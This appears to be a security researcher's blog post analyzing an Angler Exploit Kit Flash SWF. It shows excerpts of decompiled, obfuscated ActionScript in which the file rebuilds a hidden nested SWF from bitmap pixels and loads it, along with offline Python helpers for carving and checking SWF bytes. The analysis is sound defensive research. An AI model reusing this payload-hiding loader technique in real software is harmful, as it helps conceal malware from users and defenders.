I made an attempt to de-obfuscate and analyze a malicious Adobe Flash SWF file from the Malware Traffic Analysis blog about the Angler Exploit Kit. I ran through the steps I mentioned to export from the PCAP and turn the SWF file into ActionScript code.
I ended up with this ugly obfuscated mess of ActionScript code. Below is just a sampling, but here is the full obfuscated ActionScript code.
// Obfuscated decompiler output (sampling). Property and method names are looked
// up through the IlllI string table, and simple constants are hidden behind arithmetic.
var _local1:* = new ((this.1[IlllI.11IIlI1lIl](IlllI.I11lI1IlI1) as Class))();
var _local2:* = new this.ll1IlI1II1lI()[IlllI.1lIlI1lI];
var _local3:int = _local2[IlllI.1lIIlI1lI1];
var _local4:int = _local2[IlllI.Ill1lI1];
var _local5:uint;
var _local6:uint = (10 - (5 * 2)); // evaluates to 0
var _local7:int;
var _local8:int;
var _local9:uint;
while (_local7 < _local3) {
    _local8 = 0;
    while (_local8 < _local4) {
        _local9 = _local2[IlllI.11lIlI](_local7, _local8);
        if ((((_local7 == 0)) && ((_local8 == 0)))){
            _local5 = (_local9 & 0xFFFFFF);
        }
        ...
    }
}
I thought I'd take a stab at de-obfuscating this code, and I was, I thought, decently successful in unraveling the first layer of obfuscation. I pasted the partially de-obfuscated code here and thought I'd review some of it below. I de-obfuscated it by renaming variables and functions, removing unnecessary variable declarations and string concatenations, removing unnecessary nested function calls, etc.
public class Document extends MovieClip {

    public function Document(){
        super();
        // Already on the stage: start now. Otherwise wait for the addedToStage event.
        if (this["stage"]){
            this.functionStartExploit();
        } else {
            this["addEventListener"]("addedToStage", this.functionStartExploit);
        };
    }
    ...
}
Per the above code, when the SWF file loads in the user's browser it does the standard start for a Flash file. The constructor checks whether the document has already been added to the stage (the main display area of the SWF); if not, it registers a listener for the addedToStage event, which fires as soon as the stage is ready. Either way, once the stage is available the attacker's code starts the exploit.
public function functionStartExploit():void{
    this["removeEventListener"]("addedToStage", this.functionStartExploit);
    // Loader for a second SWF whose bytes are rebuilt from an embedded bitmap.
    var _localEmbeddedSWF:* = new flash.display.Loader();
    _localEmbeddedSWF["loadBytes"](this.functionEmbeddedSWFFromBitmap());
    this["addChild"](_localEmbeddedSWF);
}
First the attacker removes the stage listener, since the stage has already loaded by now. Then the attacker creates a Loader as a placeholder for a nested SWF file (yes, there is essentially a SWF within a SWF). The first layer of obfuscation was the renaming of variables, the unnecessary string concatenations, etc. The second layer is that this SWF loads another, embedded SWF inside itself. So the actual exploit isn't in the SWF that I'm analyzing but in a nested one that appears to have been hidden in a bitmap, as you'll see below. Once the embedded SWF's bytes are passed to loadBytes, the Loader is added as a child of this SWF so that the nested file runs as well.
private function functionEmbeddedSWFFromBitmap(){
    var _localMaliciousByteArray:* = new flash.utils.ByteArray();
    var _localBitmap:* = new BitmapAsset()["bitmapData"];
    ...
    // Outer loop over columns (x), inner loop over rows (y).
    while (_localCounter2 < _localBitmap["width"]) {
        while (_localCounterNested < _localBitmap["height"]) {
            _localPixel = _localBitmap["getPixel"](_localCounter2, _localCounterNested);
            ...
            // Each 0xRRGGBB pixel yields three bytes: low, middle, high.
            _localMaliciousByteArray["writeByte"]((_localPixel & 0xFF));
            _localMaliciousByteArray["writeByte"](((_localPixel >> 8) & 0xFF));
            _localMaliciousByteArray["writeByte"](((_localPixel >> 16) & 0xFF));
            ...
            _localCounterNested++;
        };
        ...
        _localCounter2++;
    };
    ...
    _localMaliciousByteArray["position"] = 0;
    return (_localMaliciousByteArray);
}
Finally, in the function above, the embedded SWF is rebuilt from the pixels of a bitmap: for every pixel, the low, middle and high bytes of the 0xRRGGBB value are written to a ByteArray. The elided portions do some additional altering of the bytes before the ByteArray's position is reset to 0 and it is returned to be loaded into that nested Loader.
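As an added example (not code from the original post), the following Python replays the decompiled loop above on a constructed pixel grid, so an analyst can carve the nested SWF out of the bitmap offline instead of running the Flash file. The byte order and loop nesting mirror the ActionScript exactly; the pixel values, the function names and the signature check are this example's own.

```python
"""Replay the bitmap-to-bytes extraction performed by functionEmbeddedSWFFromBitmap().

The decompiled loop walks x across the width (outer loop) and y down the height
(inner loop); for each 0xRRGGBB pixel it writes the low, middle and high bytes,
in that order, to a ByteArray. This module rebuilds that byte stream in Python.
"""

# Constructed 2x2 "bitmap" of 0xRRGGBB pixel values (not real Angler data).
# Row 0 / column 0 is chosen so that its three bytes spell the SWF signature "FWS".
SAMPLE_PIXELS = [
    [0x535746, 0xAABBCC],  # row y=0: columns x=0, x=1
    [0x010203, 0x000000],  # row y=1
]

# Valid SWF signatures: uncompressed, zlib-compressed, LZMA-compressed.
SWF_SIGNATURES = (b"FWS", b"CWS", b"ZWS")


def get_pixel(pixels, x, y):
    """Mimic BitmapData.getPixel(x, y): column x, row y, 24-bit RGB (alpha dropped)."""
    return pixels[y][x] & 0xFFFFFF


def carve_bytes_from_bitmap(pixels):
    """Rebuild the ByteArray the ActionScript produces.

    Outer loop over width (x), inner loop over height (y); each pixel contributes
    pixel & 0xFF, (pixel >> 8) & 0xFF, (pixel >> 16) & 0xFF, exactly as in the
    three writeByte() calls of the decompiled code.
    """
    height = len(pixels)
    width = len(pixels[0]) if height else 0
    out = bytearray()
    for x in range(width):
        for y in range(height):
            pixel = get_pixel(pixels, x, y)
            out.append(pixel & 0xFF)
            out.append((pixel >> 8) & 0xFF)
            out.append((pixel >> 16) & 0xFF)
    return bytes(out)


def find_swf_signature(data):
    """Return the offset of the first SWF signature in data, or -1 if none is present.

    Useful when the loader alters or pads the bytes before loadBytes() and the
    signature is not at offset 0.
    """
    hits = [data.find(sig) for sig in SWF_SIGNATURES]
    hits = [h for h in hits if h != -1]
    return min(hits) if hits else -1


def looks_like_swf(data):
    """True when the carved stream starts with a SWF signature."""
    return len(data) >= 3 and data[:3] in SWF_SIGNATURES


if __name__ == "__main__":
    carved = carve_bytes_from_bitmap(SAMPLE_PIXELS)
    print(carved.hex(), "swf signature at offset", find_swf_signature(carved))
```

With a real sample you would feed the carved bytes into the same decompiler used for the outer file; if no signature is found at offset 0, the elided code between the getPixel() and writeByte() calls is the place to look for the transformation that has to be undone.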
I found it interesting to see this nested obfuscation technique in action and it definitely makes it harder to analyze as a security researcher because the exploit you're looking for doesn't even actually exist in this SWF file that we spotted.
More about neonprimetime
Top Blogs of all-time
Top Github Contributions
Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Thursday, June 2, 2016
Decompile an Adobe Flash SWF File
If you were analyzing a malicious Adobe Flash SWF file, such as the ones mentioned in Brad's Malware Traffic Analysis blog about the Angler Exploit Kit, you might be wondering what's actually a good way to analyze that SWF, since it's already compiled and unreadable. Well, remember first that if you have a PCAP with a SWF file in it, per a previous blog post, you need to export the HTTP object. Now that you have the SWF file, it's actually quite easy to decompile it and get some Adobe ActionScript code to review. You could use any free online decompiler like showmycode.com: upload the SWF file and it will immediately spit out some ActionScript for you.
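Before uploading an exported file to a decompiler it is worth confirming it really is a SWF and noting its version and compression. The following Python is an added example, not part of the original post: it parses the 8-byte SWF header (signature, version, declared uncompressed length) and inflates the zlib-compressed CWS form. The sample file it checks is constructed in the code with zlib so the example runs offline; the function names are this example's own.

```python
"""Minimal SWF header triage for a file exported from a PCAP.

SWF files begin with a three-byte signature: FWS (uncompressed), CWS (body zlib
compressed after the 8-byte header) or ZWS (body LZMA compressed). Byte 3 is
the SWF version and bytes 4..7 are the little-endian length of the whole
uncompressed file, header included.
"""
import struct
import zlib

SWF_SIGNATURES = (b"FWS", b"CWS", b"ZWS")


def build_sample_cws(version=11):
    """Construct a small CWS file for this example (placeholder body, not real malware)."""
    body = bytes(range(32))                 # constructed body bytes
    uncompressed_len = 8 + len(body)        # declared length covers the header too
    header = b"CWS" + bytes([version]) + struct.pack("<I", uncompressed_len)
    return header + zlib.compress(body)


def parse_swf_header(data):
    """Return a dict describing the SWF header, or None if data is not a SWF.

    For FWS and CWS the uncompressed body is returned and checked against the
    declared length. ZWS (LZMA) is recognised but not decompressed here.
    """
    if len(data) < 8:
        return None
    sig = data[:3]
    if sig not in SWF_SIGNATURES:
        return None
    version = data[3]
    declared_len = struct.unpack("<I", data[4:8])[0]
    if sig == b"FWS":
        body = data[8:]
    elif sig == b"CWS":
        try:
            body = zlib.decompress(data[8:])
        except zlib.error:
            body = None                     # truncated or corrupt compressed stream
    else:
        body = None                         # ZWS: LZMA stream with a SWF-specific prefix
    return {
        "signature": sig.decode("ascii"),
        "version": version,
        "declared_length": declared_len,
        "body": body,
        "length_matches": body is not None and 8 + len(body) == declared_len,
    }


if __name__ == "__main__":
    info = parse_swf_header(build_sample_cws())
    print({k: v for k, v in info.items() if k != "body"})
```

A length mismatch or a failed inflate usually means the HTTP export was truncated or the object was not the SWF itself, which is worth knowing before trusting whatever the decompiler produces.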